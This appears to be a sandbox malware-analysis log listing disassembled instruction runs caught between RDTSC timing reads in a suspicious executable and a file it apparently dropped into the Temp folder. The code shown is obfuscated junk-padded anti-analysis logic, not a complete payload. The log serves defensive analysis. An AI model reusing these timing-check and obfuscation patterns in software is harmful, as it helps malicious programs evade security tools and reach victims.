Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9021F second address: 4E90315 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 call 00007F79C0CFE2A3h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e sub esp, 2Ch 0x00000011 pushad 0x00000012 mov cx, di 0x00000015 call 00007F79C0CFE2A1h 0x0000001a pushfd 0x0000001b jmp 00007F79C0CFE2A0h 0x00000020 add cx, 41F8h 0x00000025 jmp 00007F79C0CFE29Bh 0x0000002a popfd 0x0000002b pop esi 0x0000002c popad 0x0000002d push ecx 0x0000002e jmp 00007F79C0CFE2A4h 0x00000033 mov dword ptr [esp], ebx 0x00000036 jmp 00007F79C0CFE2A0h 0x0000003b xchg eax, edi 0x0000003c jmp 00007F79C0CFE2A0h 0x00000041 push eax 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F79C0CFE2A1h 0x00000049 and esi, 54BD7AA6h 0x0000004f jmp 00007F79C0CFE2A1h 0x00000054 popfd 0x00000055 pushfd 0x00000056 jmp 00007F79C0CFE2A0h 0x0000005b and esi, 3F41C048h 0x00000061 jmp 00007F79C0CFE29Bh 0x00000066 popfd 0x00000067 popad 0x00000068 xchg eax, edi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F79C0CFE2A0h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90315 second address: 4E90324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90324 second address: 4E9032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9032A second address: 4E9032E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9032E second address: 4E90332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9035E second address: 4E90364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90364 second address: 4E90368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90368 second address: 4E9036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9036C second address: 4E90402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub ebx, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F79C0CFE2A1h 0x00000011 adc cx, 7ED6h 0x00000016 jmp 00007F79C0CFE2A1h 0x0000001b popfd 0x0000001c mov dx, cx 0x0000001f popad 0x00000020 sub edi, edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F79C0CFE2A9h 0x00000029 sbb si, 02E6h 0x0000002e jmp 00007F79C0CFE2A1h 0x00000033 popfd 0x00000034 mov di, si 0x00000037 popad 0x00000038 inc ebx 0x00000039 jmp 00007F79C0CFE29Ah 0x0000003e test al, al 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F79C0CFE2A7h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90402 second address: 4E9041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0513874h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9041A second address: 4E90474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F79C0CFE3F0h 0x0000000e jmp 00007F79C0CFE2A7h 0x00000013 lea ecx, dword ptr [ebp-14h] 0x00000016 jmp 00007F79C0CFE2A6h 0x0000001b mov dword ptr [ebp-14h], edi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F79C0CFE2A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90474 second address: 4E9047A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E904CB second address: 4E904D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E904D1 second address: 4E90508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [754486D4h] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 push FFFFFFFEh 0x00000016 push 775DCA08h 0x0000001b push 7754AE00h 0x00000020 mov eax, dword ptr fs:[00000000h] 0x00000026 push eax 0x00000027 sub esp, 0Ch 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [775FB370h] 0x00000032 xor dword ptr [ebp-08h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 lea eax, dword ptr [ebp-10h] 0x0000003b mov dword ptr fs:[00000000h], eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 mov eax, dword ptr fs:[00000018h] 0x0000004a test eax, eax 0x0000004c je 00007F79C0556EB1h 0x00000052 mov dword ptr [ebp-04h], 00000000h 0x00000059 mov edx, dword ptr [ebp+08h] 0x0000005c mov dword ptr [eax+00000BF4h], edx 0x00000062 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000069 test edx, edx 0x0000006b je 00007F79C0513909h 0x00000071 xor edx, edx 0x00000073 jmp 00007F79C0513848h 0x00000075 mov eax, edx 0x00000077 mov ecx, dword ptr [ebp-10h] 0x0000007a mov dword ptr fs:[00000000h], ecx 0x00000081 pop ecx 0x00000082 pop edi 0x00000083 pop esi 0x00000084 pop ebx 0x00000085 mov esp, ebp 0x00000087 pop ebp 0x00000088 retn 0004h 0x0000008b push eax 0x0000008c push edx 0x0000008d jmp 00007F79C0513877h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90508 second address: 4E90532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7D7Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F79C0CFE29Ch 0x00000011 jg 00007F7A3125C202h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edi, 439C7AD0h 0x0000001f mov ax, bx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90532 second address: 4E90538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90538 second address: 4E9053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9053C second address: 4E90588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F79C051389Eh 0x0000000e pushad 0x0000000f pushad 0x00000010 mov bl, ah 0x00000012 mov esi, edx 0x00000014 popad 0x00000015 movsx ebx, ax 0x00000018 popad 0x00000019 cmp dword ptr [ebp-14h], edi 0x0000001c jmp 00007F79C0513874h 0x00000021 jne 00007F7A30A71795h 0x00000027 jmp 00007F79C0513870h 0x0000002c mov ebx, dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90588 second address: 4E905CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushfd 0x00000008 jmp 00007F79C0CFE2A4h 0x0000000d xor ax, 9B08h 0x00000012 jmp 00007F79C0CFE29Bh 0x00000017 popfd 0x00000018 pop esi 0x00000019 popad 0x0000001a lea eax, dword ptr [ebp-2Ch] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F79C0CFE2A2h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E905CE second address: 4E90607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F79C0513876h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push edi 0x00000013 pop ecx 0x00000014 movsx edi, cx 0x00000017 popad 0x00000018 mov cl, D2h 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90607 second address: 4E9061F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9061F second address: 4E9067D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b call 00007F79C0513874h 0x00000010 movzx eax, di 0x00000013 pop ebx 0x00000014 mov cl, 69h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F79C0513874h 0x0000001f adc cx, 9A18h 0x00000024 jmp 00007F79C051386Bh 0x00000029 popfd 0x0000002a mov edi, eax 0x0000002c popad 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9067D second address: 4E90681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90681 second address: 4E90698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90698 second address: 4E906B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 32h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F79C0CFE2A3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E906B8 second address: 4E906F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edi, 78C3FC02h 0x00000010 mov si, dx 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F79C0513870h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E907CE second address: 4E90010 instructions: 0x00000000 rdtsc 0x00000002 call 00007F79C0CFE2A8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F7A3125C0FFh 0x00000011 xor eax, eax 0x00000013 jmp 00007F79C0CD79CAh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 sub esp, 04h 0x00000023 mov esi, eax 0x00000025 xor ebx, ebx 0x00000027 cmp esi, 00000000h 0x0000002a je 00007F79C0CFE3D5h 0x00000030 call 00007F79C57BA2DCh 0x00000035 mov edi, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F79C0CFE29Ch 0x0000003e rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90010 second address: 4E90027 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90027 second address: 4E9002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9002C second address: 4E900B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F79C051386Ch 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F79C051386Eh 0x00000019 xor ax, 80B8h 0x0000001e jmp 00007F79C051386Bh 0x00000023 popfd 0x00000024 mov ch, 80h 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F79C0513871h 0x00000030 xor ecx, 1E3B4356h 0x00000036 jmp 00007F79C0513871h 0x0000003b popfd 0x0000003c mov esi, 54D29CC7h 0x00000041 popad 0x00000042 xchg eax, ecx 0x00000043 jmp 00007F79C051386Ah 0x00000048 push eax 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E900B3 second address: 4E900E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 mov ax, dx 0x0000000b popad 0x0000000c xchg eax, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, AAh 0x00000012 call 00007F79C0CFE2A9h 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9011A second address: 4E90129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90129 second address: 4E9012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E9012F second address: 4E90133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90133 second address: 4E90158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, ax 0x0000000f call 00007F79C0CFE2A4h 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90CE1 second address: 4E90D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 527C4F45h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F79C0513875h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90D0A second address: 4E90D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90D0E second address: 4E90D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90D14 second address: 4E90D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 call 00007F79C0CFE2A6h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xor dword ptr [esp], 273FD36Dh 0x00000015 jmp 00007F79C0CFE2A1h 0x0000001a call 00007F7A312530BDh 0x0000001f push 753E2B70h 0x00000024 push dword ptr fs:[00000000h] 0x0000002b mov eax, dword ptr [esp+10h] 0x0000002f mov dword ptr [esp+10h], ebp 0x00000033 lea ebp, dword ptr [esp+10h] 0x00000037 sub esp, eax 0x00000039 push ebx 0x0000003a push esi 0x0000003b push edi 0x0000003c mov eax, dword ptr [75444538h] 0x00000041 xor dword ptr [ebp-04h], eax 0x00000044 xor eax, ebp 0x00000046 push eax 0x00000047 mov dword ptr [ebp-18h], esp 0x0000004a push dword ptr [ebp-08h] 0x0000004d mov eax, dword ptr [ebp-04h] 0x00000050 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000057 mov dword ptr [ebp-08h], eax 0x0000005a lea eax, dword ptr [ebp-10h] 0x0000005d mov dword ptr fs:[00000000h], eax 0x00000063 ret 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 pushfd 0x0000006a jmp 00007F79C0CFE2A9h 0x0000006f xor cl, FFFFFFE6h 0x00000072 jmp 00007F79C0CFE2A1h 0x00000077 popfd 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90D85 second address: 4E90DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 4A396922h 0x00000008 mov bx, F56Eh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov esi, 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F79C0513871h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4E90DAC second address: 4E90DB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0A41 second address: 4EA0A71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov bx, 14C0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 mov edx, 35BC39A2h 0x00000016 popad 0x00000017 mov dword ptr [esp], esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F79C0513870h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0A71 second address: 4EA0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F79C0CFE2A4h 0x00000013 or ecx, 4B320098h 0x00000019 jmp 00007F79C0CFE29Bh 0x0000001e popfd 0x0000001f popad 0x00000020 test esi, esi 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F79C0CFE2A1h 0x00000029 call 00007F79C0CFE2A0h 0x0000002e pop ecx 0x0000002f popad 0x00000030 pushad 0x00000031 mov si, dx 0x00000034 jmp 00007F79C0CFE29Dh 0x00000039 popad 0x0000003a popad 0x0000003b je 00007F7A3123BB67h 0x00000041 jmp 00007F79C0CFE29Eh 0x00000046 cmp dword ptr [7544459Ch], 05h 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 call 00007F79C0CFE29Dh 0x00000055 pop ecx 0x00000056 mov bx, 6F64h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0B17 second address: 4EA0B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C051386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F7A30A691D8h 0x0000000f jmp 00007F79C0513870h 0x00000014 xchg eax, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dx, C430h 0x0000001c jmp 00007F79C0513879h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0B5D second address: 4EA0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0B63 second address: 4EA0B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F79C051386Bh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0B7D second address: 4EA0B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0B82 second address: 4EA0BBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0513874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 call 00007F79C0513879h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0BBC second address: 4EA0BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79C0CFE29Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0C49 second address: 4EA0C54 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 mov ah, 38h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0C54 second address: 4EA0CAE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F79C0CFE2A7h 0x00000008 or ecx, 2E96192Eh 0x0000000e jmp 00007F79C0CFE2A9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F79C0CFE2A8h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ElmEHL9kP9.exe RDTSC instruction interceptor: First address: 4EA0CAE second address: 4EA0CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C4F1 second address: 88C4FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F79C0CFE296h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C4FE second address: 88C502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C645 second address: 88C64D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C64D second address: 88C651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C651 second address: 88C662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE29Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 88C7F2 second address: 88C7F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 89045E second address: 890462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890462 second address: 890468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\5TWLADXGMSKDNXXRW4MQ8.exe RDTSC instruction interceptor: First address: 890468 second address: 71DEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79C0CFE2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 6A487D6Eh 0x00000010 mov cl, 1Ah 0x00000012 push dword ptr [ebp+122D1551h] 0x00000018 mov edi, dword ptr [ebp+122D3E22h] 0x0000001e call dword ptr [ebp+122D320Eh] 0x00000024 pushad 0x00000025 pushad 0x00000026 mov ax, 612Ch 0x0000002a jmp 00007F79C0CFE29Ah 0x0000002f popad 0x00000030 xor eax, eax 0x00000032 clc 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 add dword ptr [ebp+122D373Fh], edx 0x0000003d mov dword ptr [ebp+122D3E0Ah], eax 0x00000043 jbe 00007F79C0CFE297h 0x00000049 mov esi, 0000003Ch 0x0000004e clc 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 mov dword ptr [ebp+122D367Ah], edi 0x00000059 lodsw 0x0000005b sub dword ptr [ebp+122D2C6Ch], edi 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 clc 0x00000066 mov ebx, dword ptr [esp+24h] 0x0000006a jne 00007F79C0CFE297h 0x00000070 mov dword ptr [ebp+122D373Fh], ebx 0x00000076 nop 0x00000077 js 00007F79C0CFE2A2h 0x0000007d jo 00007F79C0CFE29Ch 0x00000083 js 00007F79C0CFE296h 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c jmp 00007F79C0CFE29Fh 0x00000091 rdtsc
